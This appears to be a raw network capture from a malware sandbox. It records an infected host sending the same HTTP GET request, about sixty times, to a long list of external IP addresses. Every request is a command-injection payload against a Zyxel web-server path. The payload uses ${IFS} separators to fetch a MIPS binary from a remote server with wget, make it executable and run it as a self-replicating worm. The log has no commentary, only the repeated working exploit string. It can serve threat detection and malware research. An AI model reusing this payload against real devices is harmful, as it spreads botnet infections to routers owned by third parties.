                                              Jan 29, 2024 07:04:07.344995975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8542192.168.2.1435270111.253.175.211443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.345030069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8543192.168.2.14486925.191.98.119443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.345088959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8544192.168.2.1452092203.15.222.174443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.345115900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8545192.168.2.144934653.94.43.150443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.345153093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8546192.168.2.145646847.232.140.177443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.345175982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8547192.168.2.145320836.90.230.23443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.345233917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8548192.168.2.145889487.51.1.159443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.345272064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8549192.168.2.145754481.193.101.207443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.345308065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8550192.168.2.145893812.233.248.141443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.345328093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8551192.168.2.1460720120.99.188.58443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.345379114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8552192.168.2.1456920121.170.174.58443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.345429897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8553192.168.2.145302444.86.205.165443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.345473051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8554192.168.2.1460076113.232.234.0443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.345498085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8555192.168.2.144226275.230.210.196443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.345520020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8556192.168.2.145683269.180.207.94443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.345560074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8557192.168.2.144627846.94.8.16443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.345602036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8558192.168.2.145126888.46.221.53443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.345649958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8559192.168.2.1443800202.71.54.52443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.345660925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8560192.168.2.1456796116.43.180.96443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.345719099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8561192.168.2.143307844.148.69.248443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.345750093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8562192.168.2.1442474114.221.137.204443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.345781088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8563192.168.2.1450684137.231.247.58443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.345814943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8564192.168.2.1458748191.85.104.196443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.345850945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8565192.168.2.1448876119.63.232.151443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.345907927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8566192.168.2.143559469.14.103.71443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.345921040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8567192.168.2.143981265.16.122.157443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.345966101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8568192.168.2.144496840.82.191.177443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.345999956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8569192.168.2.144933661.234.65.181443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.346038103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8570192.168.2.1455482183.170.101.168443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.346101046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8571192.168.2.1434530219.59.6.3443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.346137047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8572192.168.2.1455770194.203.183.172443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.346193075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8573192.168.2.1459616208.182.169.200443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.346230984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8574192.168.2.144840049.88.159.180443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.346281052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8575192.168.2.1440732160.30.3.239443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.346319914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8576192.168.2.144462494.39.26.219443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.346354008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8577192.168.2.1460958104.235.132.187443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.346390009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8578192.168.2.1460198119.244.153.67443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.346434116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8579192.168.2.143721888.167.251.86443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.346455097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8580192.168.2.1447886157.164.191.82443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.346499920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8581192.168.2.1436276191.238.12.64443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.346541882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8582192.168.2.1450242171.185.241.218443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.346568108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8583192.168.2.144817489.167.37.51443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.346611023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8584192.168.2.1449860216.104.173.190443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.346671104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8585192.168.2.1447274182.159.184.3443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.346702099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8586192.168.2.1454086100.164.67.28443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.346735001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8587192.168.2.144993648.5.171.244443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.346786976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8588192.168.2.1444970223.88.203.9443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.346820116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8589192.168.2.1451504166.233.204.250443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.346864939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8590192.168.2.1453044201.78.145.82443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.346896887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8591192.168.2.144982496.16.255.181443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.346962929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8592192.168.2.143438653.37.144.202443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.346976995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8593192.168.2.144657835.103.176.122443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.347045898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8594192.168.2.1440628189.54.253.14443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.347074986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8595192.168.2.145838423.134.169.254443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.347117901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8596192.168.2.1460572220.161.119.202443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.347157955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8597192.168.2.1455322206.17.151.81443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.347199917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8598192.168.2.144123269.208.18.190443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.347223997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8599192.168.2.143662214.85.63.176443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.347280025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8600192.168.2.1440688182.130.58.182443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.347306013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8601192.168.2.1450890133.95.249.85443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.347347975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8602192.168.2.1442082182.22.135.173443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.347387075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8603192.168.2.145171670.54.144.15443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.347429991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8604192.168.2.1437730156.38.117.234443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.347465038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8605192.168.2.143367614.136.65.67443
                                              TimestampBytes transferredDirectionData
